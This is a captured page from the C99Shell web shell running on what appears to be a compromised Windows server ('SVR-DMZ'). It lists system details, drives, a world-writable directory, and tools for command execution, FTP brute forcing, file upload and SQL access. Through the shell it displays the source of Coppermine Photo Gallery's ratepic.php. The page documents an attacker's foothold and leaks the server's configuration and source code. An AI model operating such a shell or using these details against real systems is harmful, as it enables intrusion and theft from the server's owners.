!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\cpg1418\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ratepic.php (4.96 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
  
  ********************************************
  Coppermine version: 1.4.18
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/ratepic.php $
  $Revision: 4380 $
  $Author: gaugau $
  $Date: 2008-04-12 12:00:19 +0200 (Sa, 12 Apr 2008) $
**********************************************/

define('IN_COPPERMINE'true);
define('RATEPIC_PHP'true);

require(
'include/init.inc.php');
// Check if required parameters are present
if (!isset($_GET['pic']) || !isset($_GET['rate'])) cpg_die(CRITICAL_ERROR$lang_errors['param_missing'], __FILE____LINE__);

$pic = (int)$_GET['pic'];
$rate = (int)$_GET['rate'];

$rate min($rate5);
$rate max($rate0);

// If user does not accept script's cookies, we don't accept the vote
if (!isset($_COOKIE[$CONFIG['cookie_name'] . '_data'])) {
    
header('Location: displayimage.php?pos=' . (- $pic));
    exit;
}

// If referer is not displayimage.php we don't accept the vote
if (!eregi("displayimage",$_SERVER["HTTP_REFERER"])){
    
header('Location: displayimage.php?pos=' . (- $pic));
    exit;
}


// Retrieve picture/album information & check if user can rate picture
$sql "SELECT a.votes as votes_allowed, p.votes as votes, pic_rating, owner_id " "FROM {$CONFIG['TABLE_PICTURES']} AS p, {$CONFIG['TABLE_ALBUMS']} AS a " "WHERE p.aid = a.aid AND pid = '$pic' LIMIT 1";
$result cpg_db_query($sql);
if (!
mysql_num_rows($result)) cpg_die(CRITICAL_ERROR$lang_errors['non_exist_ap'], __FILE____LINE__);
$row mysql_fetch_array($result);
mysql_free_result($result);
if (!
USER_CAN_RATE_PICTURES || $row['votes_allowed'] == 'NO'cpg_die(ERROR$lang_errors['perm_denied'], __FILE____LINE__);
// Clean votes older votes
$curr_time time();
$clean_before $curr_time $CONFIG['keep_votes_time'] * 86400;
$sql "DELETE " "FROM {$CONFIG['TABLE_VOTES']} " "WHERE vote_time < $clean_before";
$result cpg_db_query($sql);
// Check if user already rated this picture
$user_md5_id USER_ID md5(USER_ID) : $USER['ID'];
$sql "SELECT * " "FROM {$CONFIG['TABLE_VOTES']} " "WHERE pic_id = '$pic' AND user_md5_id = '$user_md5_id'";
$result cpg_db_query($sql);
if (
mysql_num_rows($result)) cpg_die(ERROR$lang_rate_pic_php['already_rated'], __FILE____LINE__);
//Test for Self-Rating
$user=USER_ID;
$owner=$row['owner_id'];

if (!empty(
$user) && $user==$owner && !USER_IS_ADMINcpg_die(ERROR$lang_rate_pic_php['forbidden'], __FILE____LINE__);
// Update picture rating
$new_rating round(($row['votes'] * $row['pic_rating'] + $rate 2000) / ($row['votes'] + 1));
$sql "UPDATE {$CONFIG['TABLE_PICTURES']} " "SET pic_rating = '$new_rating', votes = votes + 1 " "WHERE pid = '$pic' LIMIT 1";
$result cpg_db_query($sql);
// Update the votes table
$sql "INSERT INTO {$CONFIG['TABLE_VOTES']} " "VALUES ('$pic', '$user_md5_id', '$curr_time')";
$result cpg_db_query($sql);

/**
 * Code to record the details of hits for the picture if the option is set in CONFIG
 */
if ($CONFIG['vote_details']) {
// Get the details of user browser, IP, OS, etc
$os "Unknown";
if(
eregi("Linux",$_SERVER["HTTP_USER_AGENT"])) {
    
$os "Linux";
} else if(
eregi("Windows NT 5.0",$_SERVER["HTTP_USER_AGENT"])) {
    
$os "Windows 2000";
} else if(
eregi("win98|Windows 98",$_SERVER["HTTP_USER_AGENT"])) {
    
$os "Windows 98";
}

$browser 'Unknown';
if(
eregi("MSIE",$browser)) {
    if(
eregi("MSIE 5.5",$browser)) {
        
$browser "Microsoft Internet Explorer 5.5";
    } else if(
eregi("MSIE 6.0",$browser)) {
        
$browser "Microsoft Internet Explorer 6.0";
    }
} else if(
eregi("Mozilla Firebird",$browser)) {
    
$browser "Mozilla Firebird";
} else if(
eregi("netscape",$browser)) {
    
$browser "Netscape";
}
$time time();

$referer urlencode(addslashes($_SERVER['HTTP_REFERER']));

// Insert the record in database
$query "INSERT INTO {$CONFIG['TABLE_VOTE_STATS']}
                  SET
                    pid = 
$pic,
                    rating = 
$rate,
                    Ip   = '
$raw_ip',
                    sdate = '
$time',
                    referer = '
$referer',
                    browser = '
$browser',
                    os = '
$os'";
cpg_db_query($query);
}

$location "displayimage.php?pos=" . (- $pic);
$header_location = (@preg_match('/Microsoft|WebSTAR|Xitami/'getenv('SERVER_SOFTWARE'))) ? 'Refresh: 0; URL=' 'Location: ';
header($header_location $location);
pageheader($lang_info"<META http-equiv=\"refresh\" content=\"1;url=$location\">");
msg_box($lang_info$lang_rate_pic_php['rate_ok'], $lang_continue$location);
pagefooter();
ob_end_flush();

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--